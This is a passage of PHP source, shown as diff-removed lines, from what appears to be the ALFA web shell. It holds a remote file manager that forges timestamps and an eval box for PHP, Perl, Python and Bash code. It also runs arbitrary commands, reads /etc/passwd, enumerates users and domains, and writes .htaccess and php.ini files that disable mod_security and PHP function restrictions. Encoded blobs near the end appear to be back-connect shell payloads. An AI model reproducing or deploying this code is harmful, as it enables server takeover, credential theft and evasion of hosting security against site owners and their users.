- if (!@chmod($_POST['alfa1'], $perms)) {
- if ($chdir_fals && $alfa_canruncmd) {
- alfaEx("cd '" . addslashes($_POST['c']) . "';chmod " . addslashes($_POST['alfa3']) . " '" . addslashes($alfa1_decoded) . "'");
- echo ('Success!');
- } else {
- echo '<font color="#FFFFFF"><b>zin yok </b></font><br><script>document.mf.alfa3.value="";</script>';
- }
- } else {
- echo ('Success!');
- }
- }
- clearstatcache();
- if ($chdir_fals) {
- $file_perm = $file_info[5];
- } else {
- $file_perm = substr(sprintf('%o', @fileperms($_POST['alfa1'])), -4);
- }
- echo '<script>alfa3_="";</script><form onsubmit="editor(\'' . addslashes($_POST['alfa1']) . '\',\'' . $_POST['alfa2'] . '\',this.chmod.value,\'' . $_POST['c'] . '\',\'' . $_POST['alfa4'] . '\',\'' . $ftype . '\');return false;"><input type="text" name="chmod" value="' . $file_perm . '"><input type=submit value=" "></form>';
- break;
- case 'edit' : @chdir($_POST['c']);
- if (!@is_writable($_POST['alfa1']) && !_alfa_is_writable($_POST['alfa1'])) {
- echo 'Yazlabilir deil';
- break;
- }
- if (!empty($_POST['alfa3'])) {
- $_POST['alfa3'] = substr($_POST['alfa3'], 1);
- $time = @filemtime($_POST['alfa1']);
- $fp = @__write_file($_POST['alfa1'], $_POST['alfa3']);
- if ($chdir_fals && $alfa_canruncmd) {
- $rname = $alfa1_decoded;
- $randname = $rname . rand(111, 9999);
- $filepath = dirname($_SERVER['SCRIPT_FILENAME']) . '/' . $randname;
- if ($fp = @__write_file($filepath, $_POST['alfa3'])) {
- alfaEx("mv '" . addslashes($filepath) . "' '" . addslashes($_POST['alfa1']) . "';rm -f '" . addslashes($filepath) . "'");
- }
- }
- if ($fp) {
- echo 'Saved!<br><script>alfa3_="";</script>';
- @touch($_POST['alfa1'], $time, $time);
- }
- }
- echo '<button class="button" style="border-radius:10px;" onClick="copyToClipboard(\'edit_textarea_content\');">copy to clipboard</button><form id="editor_edit_area" onsubmit="editor(\'' . addslashes($alfa1_decoded) . '\',\'' . $_POST['alfa2'] . '\',\'1\'+this.text.value,\'' . $_POST['c'] . '\',\'' . $_POST['alfa4'] . '\',\'' . $ftype . '\');return false;"><p><input type="submit" value=" "></p><textarea name="text" id="edit_textarea_content" class="bigarea" onkeydown="saveByKey(event);">';
- echo htmlspecialchars(__read_file($_POST['alfa1']));
- echo '</textarea><p><input type="submit" value=" "></p></form>';
- break;
- case 'hexdump' : @chdir($_POST['c']);
- $c = __read_file($_POST['alfa1']);
- $n = 0;
- $h = array('00000000<br>', '', '');
- $len = strlen($c);
- for ($i = 0;$i < $len;++$i) {
- $h[1].= sprintf('%02X', ord($c[$i])) . ' ';
- switch (ord($c[$i])) {
- case 0 : $h[2].= ' ';
- break;
- case 9 : $h[2].= ' ';
- break;
- case 10 : $h[2].= ' ';
- break;
- case 13:
- $h[2].= ' ';
- break;
- default:
- $h[2].= $c[$i];
- break;
- }
- $n++;
- if ($n == 32) {
- $n = 0;
- if ($i + 1 < $len) {
- $h[0].= sprintf('%08X', $i + 1) . '<br>';
- }
- $h[1].= '<br>';
- $h[2].= "
- ";
- }
- }
- echo '<div class="editor-view"><div class="view-content"><table cellspacing=1 cellpadding=5 bgcolor=black><tr><td bgcolor=gray><span style="font-weight: normal;"><pre>' . $h[0] . '</pre></span></td><td bgcolor=#282828><pre>' . $h[1] . '</pre></td><td bgcolor=#333333><pre>' . htmlspecialchars($h[2]) . '</pre></td></tr></table></div></div>';
- break;
- case 'rename':
- @chdir($_POST['c']);
- $alfa1_escape = addslashes($_POST['alfa1']);
- $alfa3_escape = addslashes($_POST['alfa3']);
- if (!empty($_POST['alfa3'])) {
- $cmd_rename = false;
- if ($chdir_fals && $alfa_canruncmd) {
- if (_alfa_is_writable($_POST['alfa1'])) {
- $alfa1_escape = addslashes($alfa1_decoded);
- alfaEx("cd '" . addslashes($_POST['c']) . "';mv '" . $alfa1_escape . "' '" . addslashes($_POST['alfa3']) . "'");
- } else {
- $cmd_rename = true;
- }
- } else {
- $alfa1_escape = addslashes($_POST['alfa1']);
- }
- if (!@rename($_POST['alfa1'], $_POST['alfa3']) && $cmd_rename) {
- echo 'Can\'t rename!<br>';
- } else {
- echo ('Renamed!<script>try{$("' . $_POST['alfa4'] . '").innerHTML = "<div class=\'editor-icon\'>"+loadType(\'' . $alfa3_escape . '\',\'' . $ftype . '\',\'' . $_POST['alfa4'] . '\')+"</div><div class=\'editor-file-name\'>' . $alfa3_escape . '</div>";editor_files["' . $_POST['alfa4'] . '"].file = "' . $alfa3_escape . '";d.files.innerHTML = d.files.innerHTML.replace(/\'' . $alfa1_escape . '\'/g, "\'' . $alfa3_escape . '\'");d.files.innerHTML = d.files.innerHTML.replace(/value\=\"' . $alfa1_escape . '\"/, \'value\=\"' . $alfa3_escape . '\"\');d.files.innerHTML = d.files.innerHTML.replace(/' . $alfa1_escape . '\<\/a\>/g, "' . $alfa3_escape . '</a>");d.files.innerHTML = d.files.innerHTML.replace(/Are You Sure For Delete # ' . $alfa1_escape . ' # \?/, "Are You Sure For Delete # ' . $alfa3_escape . ' # ?");' . ($ftype == 'dir' ? "updateDirsEditor('" . $_POST['alfa4'] . "','" . $alfa1_escape . "');" : '') . '}catch(e){console.log(e)}</script>');
- $alfa1_escape = $alfa3_escape;
- }
- }
- echo '<form onsubmit="editor(\'' . $alfa1_escape . '\',\'' . $_POST['alfa2'] . '\',this.name.value,\'' . $_POST['c'] . '\',\'' . $_POST['alfa4'] . '\',\'' . $ftype . '\');return false;"><input type="text" name="name" value="' . addslashes(htmlspecialchars(isset($_POST['alfa3']) && $_POST['alfa3'] != '' ? $_POST['alfa3'] : $alfa1_decoded)) . '"><input type=submit value=" "></form>';
- break;
- case 'touch':
- @chdir($_POST['c']);
- if (!empty($_POST['alfa3'])) {
- $time = strtotime($_POST['alfa3']);
- if ($time) {
- $touched = false;
- if ($chdir_fals && $alfa_canruncmd) {
- alfaEx("cd '" . addslashes($_POST['c']) . "';touch -d '" . htmlspecialchars(addslashes($_POST['alfa3'])) . "' '" . addslashes($alfa1_decoded) . "'");
- $touched = true;
- }
- if (!@touch($_POST['alfa1'], $time, $time) && !$touched) echo 'Fail!';
- else echo 'Touched!';
- } else echo 'Bad time format!';
- }
- clearstatcache();
- echo '<script>alfa3_="";</script><form onsubmit="editor(\'' . addslashes($_POST['alfa1']) . '\',\'' . $_POST['alfa2'] . '\',this.touch.value,\'' . $_POST['c'] . '\',\'' . $_POST['alfa4'] . '\',\'' . $ftype . '\');return false;"><input type=text name=touch value="' . date('Y-m-d H:i:s', ($chdir_fals ? $file_info[4] : @filemtime($_POST['alfa1']))) . '"><input type=submit value=" "></form>';
- break;
- case 'image':
- @chdir($_POST['c']);
- echo ('<hr>');
- $file = $_POST['alfa1'];
- $image_info = @getimagesize($file);
- if (is_array($image_info) || $chdir_fals) {
- $width = (int)$image_info[0];
- $height = (int)$image_info[1];
- if ($chdir_fals && $alfa_canruncmd) {
- $source = alfaEx("cat '" . addslashes($file) . "' | base64");
- list($width, $height) = explode(':', alfaEx("identify -format '%w:%h' '" . addslashes($file) . "'"));
- $mime = explode(':', alfaEx("file --mime-type '" . addslashes($file) . "'"));
- $image_info['mime'] = $mime[1];
- } else {
- $source = __ZW5jb2Rlcg(__read_file($file, false));
- }
- $image_info_h = 'Image type = <span>[</span> ' . $image_info['mime'] . ' <span>]</span><br>Image Size = <span>[ </span>' . $width . ' x ' . $height . '<span> ]</span><br>';
- if ($width > 800) {
- $width = 800;
- }
- echo $content = "<div class='editor-view'><div class='view-content'><center>" . $image_info_h . "<br><img id='viewImage' style='max-width:100%;border:1px solid green;' src='data:" . $image_info['mime'] . ';base64,' . $source . "' alt='" . $file . "'></center></div></div><br>";
- }
- break;
- }
- echo '</div>';
- alfaFooter();
- }
- function findicon($file, $type) {
- $s = 'http://solevisible.com/icons/';
- $types = array('json', 'ppt', 'pptx', 'xls', 'xlsx', 'msi', 'config', 'cgi', 'pm', 'c', 'cpp', 'cs', 'java', 'aspx', 'asp', 'db', 'ttf', 'eot', 'woff', 'woff2', 'woff', 'conf', 'log', 'apk', 'cab', 'bz2', 'tgz', 'dmg', 'izo', 'jar', '7z', 'iso', 'rar', 'bat', 'sh', 'alfa', 'gz', 'tar', 'php', 'php4', 'php5', 'phtml', 'html', 'xhtml', 'shtml', 'htm', 'zip', 'png', 'jpg', 'jpeg', 'gif', 'bmp', 'ico', 'txt', 'js', 'rb', 'py', 'xml', 'css', 'sql', 'htaccess', 'pl', 'ini', 'dll', 'exe', 'mp3', 'mp4', 'm4a', 'mov', 'flv', 'swf', 'mkv', 'avi', 'wmv', 'mpg', 'mpeg', 'dat', 'pdf', '3gp', 'doc', 'docx', 'docm');
- if ($type != 'file') {
- return ($file == '..' ? $s . 'back.png' : $s . 'folder.png');
- } else {
- $ext = explode('.', $file);
- $ext = end($ext);
- $ext = strtolower($ext);
- return (in_array($ext, $types) ? $s . $ext . '.png' : $s . 'notfound.png');
- }
- }
- function alfadlfile() {
- if (isset($_POST['c'], $_POST['file'])) {
- $basename = rawurldecode(basename($_POST['file']));
- $_POST['file'] = str_replace('//', '/', $_POST['c'] . '/' . $basename);
- $alfa_canruncmd = _alfa_can_runCommand(true, true);
- if (@is_file($_POST['file']) && @is_readable($_POST['file']) || $alfa_canruncmd) {
- ob_start('ob_gzhandler', 4096);
- header("Content-Disposition: attachment; filename=\"" . addslashes($basename) . "\"");
- header('Content-Type: application/octet-stream');
- if (isset($GLOBALS['glob_chdir_false'])) {
- $randname = $basename . rand(111, 9999);
- $scriptpath = dirname($_SERVER['SCRIPT_FILENAME']);
- $filepath = $scriptpath . '/' . $randname;
- if (_alfa_is_writable($scriptpath)) {
- alfaEx("cp '" . addslashes($_POST['file']) . "' '" . addslashes($filepath) . "'");
- readfile($filepath);
- @unlink($filepath);
- } else {
- alfaEx("cat '" . addslashes($_POST['file']) . "'");
- }
- } else {
- readfile($_POST['file']);
- }
- } else echo ('Error...!');
- }
- }
- function alfaphpeval() {
- alfahead();
- if (isset($_POST['alfa2']) && ($_POST['alfa2'] == 'ini')) {
- echo '<div class=header>';
- ob_start();
- $INI = ini_get_all();
- print '<table border=0><tr>' . '<td class="listing"><font class="highlight_txt">Param</td>' . '<td class="listing"><font class="highlight_txt">Global value</td>' . '<td class="listing"><font class="highlight_txt">Local Value</td>' . '<td class="listing"><font class="highlight_txt">Access</td></tr>';
- foreach ($INI as $param => $values) print "
- " . '<tr>' . '<td class="listing"><b>' . $param . '</td>' . '<td class="listing">' . $values['global_value'] . ' </td>' . '<td class="listing">' . $values['local_value'] . ' </td>' . '<td class="listing">' . $values['access'] . ' </td></tr>';
- $tmp = ob_get_clean();
- $tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU', '', $tmp);
- $tmp = preg_replace('!td, th {(.*)}!msiU', '.e, .v, .h, .h th {$1}', $tmp);
- echo str_replace('<h1', '<h2', $tmp) . '</div><br>';
- }
- if (isset($_POST['alfa2']) && ($_POST['alfa2'] == 'info')) {
- echo '<div class=header><style>.p {color:#000;}</style>';
- ob_start();
- phpinfo();
- $tmp = ob_get_clean();
- $tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU', '', $tmp);
- $tmp = preg_replace('!td, th {(.*)}!msiU', '.e, .v, .h, .h th {$1}', $tmp);
- echo str_replace('<h1', '<h2', $tmp) . '</div><br>';
- }
- if (isset($_POST['alfa2']) && ($_POST['alfa2'] == 'exten')) {
- echo '<div class=header>';
- ob_start();
- $EXT = get_loaded_extensions();
- echo '<table border=0><tr><td class="listing">' . implode('</td></tr>' . "
- " . '<tr><td class="listing">', $EXT) . '</td></tr></table>' . count($EXT) . ' extensions loaded';
- echo '</div><br>';
- }
- $lang_html = '';
- foreach (array('php' => 'php ~> [ Windows / Linux ]', 'perl' => 'perl ~> [ Linux ]', 'python' => 'python ~> [ Linux ]', 'bash' => 'bash ~> [ Linux ]') as $key => $val) {
- $lang_html.= '<option value="' . $key . '" ' . ($_POST['alfa3'] == $key ? 'selected' : '') . '>' . $val . '</option>';
- }
- echo '<div class=header><Center><a href=javascript:void(0) onclick="g(\'phpeval\',null,\'\',\'ini\')">| INI_INFO | </a><a href=javascript:void(0) onclick="g(\'phpeval\',null,\'\',\'info\')"> | phpinfo |</a><a href=javascript:void(0) onclick="g(\'phpeval\',null,\'\',\'exten\')"> | extensions |</a></center><br><form name=pf method=post onsubmit="g(\'phpeval\',null,this.code.value,null,this.language.value); return false;"><div class="txtfont">Select Language: </div> <select name="language" style="width:300px;">' . $lang_html . '</select><br><br><textarea placeholder="file_get_contents(\'/etc/passwd\');" name=code class=bigarea id=PhpCode>' . (!empty($_POST['alfa1']) ? htmlspecialchars($_POST['alfa1']) : '') . '</textarea><center><input type="submit" value="" style="margin-top:5px"></center>';
- echo '</form><pre id=PhpOutput style="' . (empty($_POST['alfa1']) ? 'display:none;' : '') . 'margin-top:5px;" class=ml1>';
- if (!empty($_POST['alfa1'])) {
- if ($_POST['alfa3'] == 'php') {
- ob_start();
- eval($_POST['alfa1']);
- $result = htmlspecialchars(ob_get_clean());
- } elseif (_alfa_can_runCommand() && $GLOBALS['sys'] == 'unix') {
- if (isset($_SESSION['eval_tmpdir'])) {
- $tempdir = $_SESSION['eval_tmpdir'];
- } else {
- $tempdir = dirname(alfaEx('mktemp'));
- $_SESSION['eval_tmpdir'] = $tempdir;
- }
- $lang = $_POST['alfa3'];
- $filename = 'temp' . rand(11111, 99999);
- $temp = $tempdir . '/' . $filename;
- __write_file($filename, $_POST['alfa1']);
- $result = alfaEx("mv {$filename} {$temp};{$lang} {$temp};rm -f {$temp}");
- @unlink($filename);
- @unlink($temp);
- }
- echo '<textarea class=bigarea id="PhpCode">' . $result . '</textarea>';
- }
- echo '</pre></div>';
- alfafooter();
- }
- function __pre() {
- return ('<pre id="strOutput" style="margin-top:5px" class="ml1">');
- }
- function alfaproc() {
- alfahead();
- echo '<Div class=header><br><center>';
- if (empty($_POST['ajax']) && !empty($_POST['alfa1'])) $_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] = false;
- if ($GLOBALS['sys'] == 'win') {
- $process = array('Grev listesi' => 'tasklist /V', 'Sistem bilgisi' => 'systeminfo', 'Aktif balantlar' => 'netstat -an', 'alan servisler' => 'net start', 'Kullanclar' => 'net user', 'ARP Tablosu' => 'arp -a', 'IP ayar' => 'ipconfig /all');
- } else {
- $process = array('lem durumu' => 'ps aux', 'Syslog' => 'cat /etc/syslog.conf', 'Resolv' => 'cat /etc/resolv.conf', 'Hosts' => 'cat /etc/hosts', 'Cpuinfo' => 'cat /proc/cpuinfo', 'Version' => 'cat /proc/version', 'Sbin' => 'ls -al /usr/sbin', 'Interrupts' => 'cat /proc/interrupts', 'lsattr' => 'lsattr -va', 'Uptime' => 'uptime', 'Fstab' => 'cat /etc/fstab', 'ErrorLog' => "tail -10000 /usr/local/apache/logs/error_log | grep '/home'", 'AccessLog' => "tail -10000 /usr/local/apache/logs/access_log | grep '/home'", 'my.conf' => "tail -10000 /etc/my.cnf | grep '/home'", 'mysqllog' => "tail -10000 /var/log/mysql.log | grep '/home'");
- }
- foreach ($process as $n => $link) {
- echo '<a href="javascript:void(0);" onclick="g(\'proc\',null,\'' . $link . '\')"> | ' . $n . ' | </a>';
- }
- echo '</center><br>';
- if (!empty($_POST['alfa1'])) {
- echo "<pre class='ml1' style='margin-top:5px' >";
- if (isset($GLOBALS['glob_chdir_false']) && !empty($_POST['c'])) {
- $cmd = "cd '" . addslashes($_POST['c']) . "';";
- }
- echo alfaEx($cmd . $_POST['alfa1']);
- echo '</pre>';
- }
- echo '</div>';
- alfafooter();
- }
- function alfasafe() {
- alfahead();
- echo "<div class=header><center><br><div class='txtfont_header'>| Auto ByPasser |</div>";
- echo '<h3><a href=javascript:void(0) onclick="g(\'safe\',null,\'php.ini\',null)">| PHP.INI | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,\'ini\')">| .htaccess(apache) | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,\'pl\')">| .htaccess(LiteSpeed) |</a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,null,\'passwd\')">| Read-Passwd | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,null,null,\'users\')">| Read-Users | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,null,null,null,\'valiases\')">| Get-User | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,null,null,null,null,null,\'domains\')">| Get-Domains | </a></center></h3>';
- if (!empty($_POST['alfa8']) && isset($_POST['alfa8']) == 'domains') {
- if (!_alfa_file_exists('/etc/virtual/domainowners')) {
- echo __pre();
- $solevisible9 = _alfa_file('/etc/named.conf');
- if (is_array($solevisible9)) {
- foreach ($solevisible9 as $solevisible13) {
- if (@eregi('zone', $solevisible13)) {
- preg_match_all('#zone "(.*)"#', $solevisible13, $solevisible14);
- if (strlen(trim($solevisible14[1][0])) > 2) {
- echo $solevisible14[1][0] . '<br>';
- }
- }
- }
- }
- } else {
- echo __pre();
- $users = _alfa_file('/etc/virtual/domainowners');
- if (is_array($users)) {
- foreach ($users as $boz) {
- $dom = explode(':', $boz);
- echo $dom[0] . "
- ";
- }
- }
- }
- }
- if (!empty($_POST['alfa6']) && isset($_POST['alfa6']) == 'valiases') {
- echo '
- <form onsubmit="g(\'safe\',null,null,null,null,null,null,\'valiases\',this.site.value,null,\'>>\'); return false;" method="post" /><center><div class="txtfont">Url: </font><input type="text" placeholder="site.com" name="site" /> <input type="submit" value=" " name="go" /></form></center>';
- if (isset($_POST['alfa9']) && $_POST['alfa9'] == '>>') {
- if (!_alfa_file_exists('/etc/virtual/domainowners')) {
- $site = trim($_POST['alfa7']);
- $rep = str_replace(array('https://', 'http://', 'www.'), '', $site);
- $user = '';
- if (function_exists('posix_getpwuid') && function_exists('fileowner')) {
- if ($user = @posix_getpwuid(@fileowner("/etc/valiases/{$rep}"))) {
- $user = $user['name'];
- }
- } else {
- if (_alfa_can_runCommand(true, true)) {
- $user = alfaEx("stat -c '%U' /etc/valiases/" . $rep);
- }
- }
- if (!empty($user) && $user != 'root') {
- echo __pre() . "<center><table border='1'><tr><td><b><font color=\"#FFFFFF\">User: </b></font></td><td><b><font color=\"#FF0000\">{$user}</font></b></td></tr><tr><td><b><font color=\"#FFFFFF\">site: </b></font></td><td><b><font color=\"#FF0000\">{$rep}</font></b></td></tr></table></center>";
- } else {
- echo __pre() . '<center><b>No such file or directory Or Disable Functions is not NONE...</b></center>';
- }
- } else {
- $site = trim($_POST['alfa7']);
- $rep = str_replace(array('https://', 'http://', 'www.'), '', $site);
- $users = _alfa_file('/etc/virtual/domainowners');
- foreach ($users as $boz) {
- $ex = explode(':', $boz);
- if ($ex[0] == $rep) {
- echo __pre() . "<center><table border='1'>
- <tr><td><b><font color=\"#FFFFFF\">User: </b></font></td><td><b><font color=\"#FF0000\">" . trim($ex[1]) . "</font></b></td></tr>
- <tr><td><b><font color=\"#FFFFFF\">site: </b></font></td><td><b><font color=\"#FF0000\">{$rep}</font></b></td></tr></table></center>";
- break;
- }
- }
- }
- }
- }
- if (!empty($_POST['alfa5']) && isset($_POST['alfa5'])) {
- if (!_alfa_file_exists('/etc/virtual/domainowners')) {
- echo __pre();
- $i = 0;
- while ($i < 60000) {
- $line = @posix_getpwuid($i);
- if (!empty($line)) {
- while (list($key, $vl) = each($line)) {
- echo $vl . "
- ";
- break;
- }
- }
- $i++;
- }
- } else {
- echo __pre();
- $users = _alfa_file('/etc/virtual/domainowners');
- foreach ($users as $boz) {
- $user = explode(':', $boz);
- echo trim($user[1]) . '<br>';
- }
- }
- }
- if (!empty($_POST['alfa4']) && isset($_POST['alfa4'])) {
- echo __pre();
- if (_alfa_can_runCommand(true, true)) {
- echo __read_file('/etc/passwd');
- } elseif (function_exists('posix_getpwuid')) {
- for ($uid = 0;$uid < 60000;$uid++) {
- $ara = @posix_getpwuid($uid);
- if (!empty($ara)) {
- while (list($key, $val) = each($ara)) {
- echo "$val:";
- }
- echo "
- ";
- }
- }
- } else {
- __alert('failed...');
- }
- }
- if (!empty($_POST['alfa2']) && isset($_POST['alfa2'])) {
- @__write_file($GLOBALS['cwd'] . '.htaccess', "#Generated By MKA7
- <IfModule mod_security.c>
- Sec------Engine Off
- Sec------ScanPOST Off
- </IfModule>");
- echo '<center><b><big>htaccess for Apache created...!</center></b></big>';
- }
- if (!empty($_POST['alfa1']) && isset($_POST['alfa1'])) {
- @__write_file($GLOBALS['cwd'] . 'php.ini', "safe_mode=OFF
- disable_functions=MKA7");
- echo '<center><b><big> php.ini created...!</center></b></big>';
- }
- if (!empty($_POST['alfa3']) && isset($_POST['alfa3'])) {
- @__write_file($GLOBALS['cwd'] . '.htaccess', "#Generated By MKA7
- <Files *.php>
- ForceType application/x-httpd-php4
- </Files>
- <IfModule mod_security.c>
- SecFilterEngine Off
- SecFilterScanPOST Off
- </IfModule>");
- echo '<center><b><big>htaccess for Litespeed created...!</center></b></big>';
- }
- echo '<br></div>';
- alfafooter();
- }
- function __get_resource($content) {
- return @gzinflate(__ZGVjb2Rlcg($content));
- }
- function __write_file($file, $content) {
- if ($fh = @fopen($file, 'wb')) {
- if (fwrite($fh, $content) !== false) return true;
- }
- return false;
- }
- function bcinit($evalType, $evalCode, $evalOptions, $evalArguments) {
- $res = "<font color='green'>[ Success...! ]</font>";
- $err = "<font color='red'>[ Failed...! ]</font>";
- if ($evalOptions != '') $evalOptions = $evalOptions . ' ';
- if ($evalArguments != '') $evalArguments = ' ' . $evalArguments;
- if ($evalType == 'c') {
- $tmpdir = ALFA_TEMPDIR;
- chdir($tmpdir);
- if (is_writable($tmpdir)) {
- $uniq = substr(md5(time()), 0, 8);
- $filename = $evalType . $uniq . '.c';
- $path = $filename;
- if (__write_file($path, $evalCode)) {
- $ext = ($GLOBALS['sys'] == 'win') ? '.exe' : '.out';
- $pathres = $filename . $ext;
- $evalOptions = '-o ' . $pathres . ' ' . $evalOptions;
- $cmd = 'gcc ' . $evalOptions . $path;
- alfaEx($cmd);
- if (is_file($pathres)) {
- if (chmod($pathres, 0755)) {
- $cmd = $pathres . $evalArguments;
- alfaEx($cmd);
- } else {
- $res = $err;
- }
- unlink($pathres);
- } else {
- $res = $err;
- }
- unlink($path);
- } else {
- $res = $err;
- }
- }
- return $res;
- } elseif ($evalType == 'java') {
- $tmpdir = ALFA_TEMPDIR;
- chdir($tmpdir);
- if (is_writable($tmpdir)) {
- if (preg_match("/class\ ([^{]+){/i", $evalCode, $r)) {
- $classname = trim($r[1]);
- $filename = $classname;
- } else {
- $uniq = substr(md5(time()), 0, 8);
- $filename = $evalType . $uniq;
- $evalCode = 'class ' . $filename . ' { ' . $evalCode . ' } ';
- }
- $path = $filename . '.java';
- if (__write_file($path, $evalCode)) {
- $cmd = 'javac ' . $evalOptions . $path;
- alfaEx($cmd);
- $pathres = $filename . '.class';
- if (is_file($pathres)) {
- if (chmod($pathres, 0755)) {
- $cmd = 'java ' . $filename . $evalArguments;
- alfaEx($cmd);
- } else {
- $res = $err;
- }
- unlink($pathres);
- } else {
- $res = $err;
- }
- unlink($path);
- } else {
- $res = $err;
- }
- }
- return $res;
- }
- return false;
- }
- function alfaconnect() {
- alfahead();
- $php = '7VZta9swEP5e6H9QjaE2S5uXfhg0pDBYPw7KVtiHtjOOLNcitqVJ8pKxpb99d36L4zid17WwQV1wrbvTo0e6Oz1hSgnlKSaFMjy9d0bu9PBAM+MZnjAv5gk3hU3MPZ7ImFNuvDDOdOSg1Ta+umdGkxlhKxmLgDkWsQaktOchFL3js7O3OFj6MEizOMYBaw50BAMLUIAJub78+GG2Mkwl06tP49nxrX31+f3F8bR0g206nPN0CJNOuIXTE5z9QN7FoU+umZ8QHbE4Jg/k8AD9PCQOFVlqnIqyS2ZAyyU/Dg8IPLYEgNI3LU05I6saGRzBogFa1oTFmu1BnXSi6pvRXRO5No/vtpfw6SJfomAdZik1XKQeW3FttHMsaWpiLxRqcew2FuIBTN748vSgBzEK74yc4IYBxzjjtru0j5p2KTRfeVANmgeO2wFQUkTe1dlsGGHatVGQC08LuoCa0kx9Y8qxDJXnw+HoNP87t8gp0IeaYUqlovgP8yoiFURZkyKDw9YDclYztenOQj6lTGJcczcQYkQslsBAZ3MYOTKSXpb6CXPcARkBpptv0lrydLMPfMKl4oY5NgV2CdCFtNElHskpsS6sahF8lhGPGZ4oOQKk0Ici2UKqiyLE1ANic3J97orde4lvaORYQxrcEufmy62+e+MOOfYWnpVS7g5ujh1gGYB7U1VtdK69gCsHIgGCRtV3R7QtAGt7r62oTRsYxZPmEduyPEysFov8/En2RnzNIMIlc8jgooWP6AUNHxr7coWTkIi1k4TWxGbGRHNv60ZWaSw0a+WgMtalU2xxbzU059oB1ryvlP/dGZHZRflpSS4ZJM5SFtTZuMOxRMek27G1gFTY5EpQT0iWAstogKtiUXDZjMSUHEGmFdMiUxTYSqyY7d7Hp9Fe8xi6B0UAweCygp7oFTnuHTnpFUlbQWVPGZXt9lJ+QzIRYhaxyIrvgpXbXVO28uss5Tms9lBSbHdCzTFmFO4U5UPkEl8MXqheXS3MU6+xgvL3dCvHmwDggyKO6q42rOqtyorN21HrxwjU2+vDog5+nAp9EovJn7CY/D2Ljl7XXb3eeQEUp73PM97r2S6gvFcrb61p6+YPiEo9Ufa31TNEOSsaPSrvfZbia0v/nknb9LNr207uXrWtib9P2+AHa1910z3UrYeQ6VchexEh008SMv0kIdMvLmS65+Wt/ych0/+EkP2ORV8he2nN+gU=';
- $python = 'pVRtT9swEP6cSv0PxptWR80M7YY0wYJUQZjQBlRtp30AVqXOpYmWOpHtQPnCb5/tJG1AHUKaqra+V99z95zf7e2XUuwvUr4P/B4VjyrJebeTropcKCTAk+WiEDkDKb1cevJRf3P2B5Sn0hV0O4WPcbeT2N8IYiQTyDLC3KNuxzFx/jaejvMCOGGe9fFnotTZVZSX6pnTxTgwahBilzrlL7WuvkmAKgVHRk2rlFRAGBG336h0upZqVSjiUuAsj4D0ShV//NLTeSoIIVNpzmsMaYxySXm4gj0fc4WNzol9RuM0A54Tc7ujPXRjFKwIhrVt3CyYXPprBWJ1PJ4O/N778a+zk95xbdWqY9tymaCPKfr6AfelEiR2+xidtIXhVjIXQSbBFvCQ6NuR6aAVHSUeq4MjdGkC2D0ZHAw/uzQCCxFbiNgW68CaQaFq/yKUstI2uR2DWWMjwj05qDXOwhdAJYSCJQSz6BaRm9+38q7vYk94cRYupXG4+HZ1PQlOR9PAreN0qkWTo+5lEaqEpjJKBVnQpcjLggxcd+NkmsmSF9bGqEcJPCL/mmDj18Ki8xl+WVYKt11JqVDII4tUnw3WOruRKkebB9XkOg+11HCkqeBoSz58y3FfF78ExR4Mz/CJ3omlr5lBQ7G810tV9XXp+v7Q7oe/vBncdTuQtSyf2hYn0YehddGVwDpVuhtm6VKuSKFP0q+2kVZ/pJZG5/OLq2BWryqdXp9+n09nk2B0aWI0TGUsebEJmF7/mBuvdsx8EvycBqOzs4lnLn1ZvaSawREh+IDaD/YKOwBJs1TvAieHRjLM1Csfur7uAjPEsyvT4qB5R6jMAAqLbTu8navXUIDgJzTK4hDNIFyhqZkvetIT2M2JLSFeC8ebp2F3ls3D8KwZdmAGJtLEzTkHpghJ6mbsxnn4Bpzy/3C+Fv5GnNL9Cw==';
- $perl = 'lZLRjpNAFIav26TvMOJsC8kYWr1bpJFQ3DRrS8OwGmOVsPSsTKQDgVm3m+722Z0BVifGGL0755/Dd+Abnj+zb5vavmbcBv4dVVAXo+FtA2gZnp/TMvsGwhkNcdm4+EuoqiZ3DThUZS1QHEQr9yCg3jsbOnMnW7z5sNjOJ05/LkOnJTc5esEM+TS7MRXqtLfvZMysY4s788MV3QT+GbIvDedRLhHuVxBVXYry+p6nezAnIqsmliQ07SuZlIw3b5PlOojJmIb+ZULjKPBWBAvr4WHHwLS6bW+86OK9686s42g4wJWLVf9p+lmeDhoQilZWCkfDd4kCSSANkyi4ooG3WERkpkAD+RE7OaTG092uThg3cUWWazWSeOuPlrZ1ULBGAJfjr/Q0zTKQm3xCrW65JPrEOCGvuElRDOke0RyKAp223CDTdqisgCMaL5ZrYrwe+4bzFIRXMTHmehJEUZ/I5+AAGZJqtfVZUTZg+pbTFfRnoehaI8laJ6lWB2QCTWUlLweK5pfYl38Si/O+nXUtcxkHkaSilNpyXQpO3d+cYqafZyXnkKn7wamet/boP9gze3vzMTUs5ynp9elR709FfxP4f946W3BU+kz5Jz3+AA==';
